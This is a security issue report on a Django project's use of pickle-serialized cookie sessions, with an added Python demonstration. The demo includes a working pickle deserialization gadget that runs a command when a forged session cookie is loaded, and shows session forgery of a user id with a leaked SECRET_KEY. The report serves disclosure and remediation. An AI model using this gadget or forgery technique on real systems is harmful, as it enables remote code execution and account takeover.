Hi,
This is Qihoo360 CodeSafe Team, we found a Django Bad Practices: Pickle Serialized Sessions issue, see
neurovault/settings.py at line 219
If cookie-based sessions are used and SECRET_KEY is leaked, an attacker will be able to store arbitrary data in the session cookie which will be deserialized in the server leading to arbitrary code execution.
If cookie-based sessions are used, take extra care to make sure that the secret key is always kept completely secret, for any system which might be remotely accessible.
django.contrib.sessions.serializers.JSONSerializer is recommended.
Since I am not familiar with NeuroVault, I hope you can look into it.
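To make the report concrete, the following is an added, stand-alone example (not NeuroVault code and not part of the original issue) that models Django's signed-cookie session backend with the standard library only: an HMAC-signed cookie whose payload is decoded by a pluggable serializer, written in the shape of Django's PickleSerializer and JSONSerializer. It shows that once SECRET_KEY is known, a pickle-based session executes attacker-chosen code at load time, whereas a JSON-based session rejects the same payload. It also shows the caveat that still applies after the fix: with a leaked key an attacker can still forge arbitrary session data (for instance a user id), so switching the serializer limits the impact to data forgery rather than removing the need to protect the key. The key, cookie format and session contents are constructed for the example. The setting itself is one line in settings.py: SESSION_SERIALIZER = "django.contrib.sessions.serializers.JSONSerializer", which has been Django's default since 1.6; PickleSerializer was deprecated in Django 4.1 and removed in 5.0.

```python
import base64
import hashlib
import hmac
import json
import pickle
import subprocess
import sys

# Constructed example key. The issue's point is what happens once this leaks.
SECRET_KEY = "django-insecure-example-key-do-not-use"


class Exploit:
    """Object whose pickle stream tells the loader to call subprocess.check_output.

    pickle invokes the callable from __reduce__ with the given args while
    loading, before any application code sees the session data. A real payload
    would run os.system or similar as the web server user; here it runs a
    harmless interpreter that prints 'pwned' so the effect is observable.
    """

    def __reduce__(self):
        return (subprocess.check_output, ([sys.executable, "-c", "print('pwned')"],))


class PickleSerializer:
    """Shape of the removed django.contrib.sessions.serializers.PickleSerializer."""

    def dumps(self, obj):
        return pickle.dumps(obj)

    def loads(self, data):
        return pickle.loads(data)


class JSONSerializer:
    """Shape of django.contrib.sessions.serializers.JSONSerializer (latin-1, compact)."""

    def dumps(self, obj):
        return json.dumps(obj, separators=(",", ":")).encode("latin-1")

    def loads(self, data):
        return json.loads(data.decode("latin-1"))


def _b64e(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64d(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_cookie(payload, key):
    """Constructed cookie format: base64(payload).hex(HMAC-SHA256(key, payload))."""
    mac = hmac.new(key.encode(), payload, hashlib.sha256).hexdigest()
    return f"{_b64e(payload)}.{mac}"


def unsign_cookie(cookie, key):
    body, _, mac = cookie.rpartition(".")
    payload = _b64d(body)
    expected = hmac.new(key.encode(), payload, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, mac):
        raise ValueError("bad signature")
    return payload


def load_session(cookie, key, serializer):
    """Like the signed-cookie backend: a bad signature or undecodable payload yields an empty session."""
    try:
        return serializer.loads(unsign_cookie(cookie, key))
    except Exception:
        return {}


def forge_with_pickle():
    """Leaked key + PickleSerializer: the exploit runs during loads() and its output becomes the 'session'."""
    cookie = sign_cookie(PickleSerializer().dumps(Exploit()), SECRET_KEY)
    return load_session(cookie, SECRET_KEY, PickleSerializer())


def forge_against_json():
    """Same forged cookie against JSONSerializer: json.loads rejects the pickle bytes, nothing executes."""
    cookie = sign_cookie(PickleSerializer().dumps(Exploit()), SECRET_KEY)
    return load_session(cookie, SECRET_KEY, JSONSerializer())


def forge_json_data():
    """The remaining risk after the fix: a leaked key still lets an attacker forge session data."""
    cookie = sign_cookie(JSONSerializer().dumps({"_auth_user_id": "1"}), SECRET_KEY)
    return load_session(cookie, SECRET_KEY, JSONSerializer())


def tamper_without_key():
    """Without the key the signature check fails and the forged session is discarded."""
    cookie = sign_cookie(JSONSerializer().dumps({"_auth_user_id": "1"}), "wrong-key")
    return load_session(cookie, SECRET_KEY, JSONSerializer())


if __name__ == "__main__":
    print("pickle:", forge_with_pickle())      # b'pwned\n': attacker code ran
    print("json:  ", forge_against_json())     # {}: payload rejected
    print("data:  ", forge_json_data())        # {'_auth_user_id': '1'}: data forgery still works
    print("nokey: ", tamper_without_key())     # {}: signature check holds
```

The signing format above is deliberately simplified (Django's signer also salts the key and includes a timestamp); the comparison that matters is the serializer step after the signature check, which is where a pickle payload turns a forged cookie into code execution.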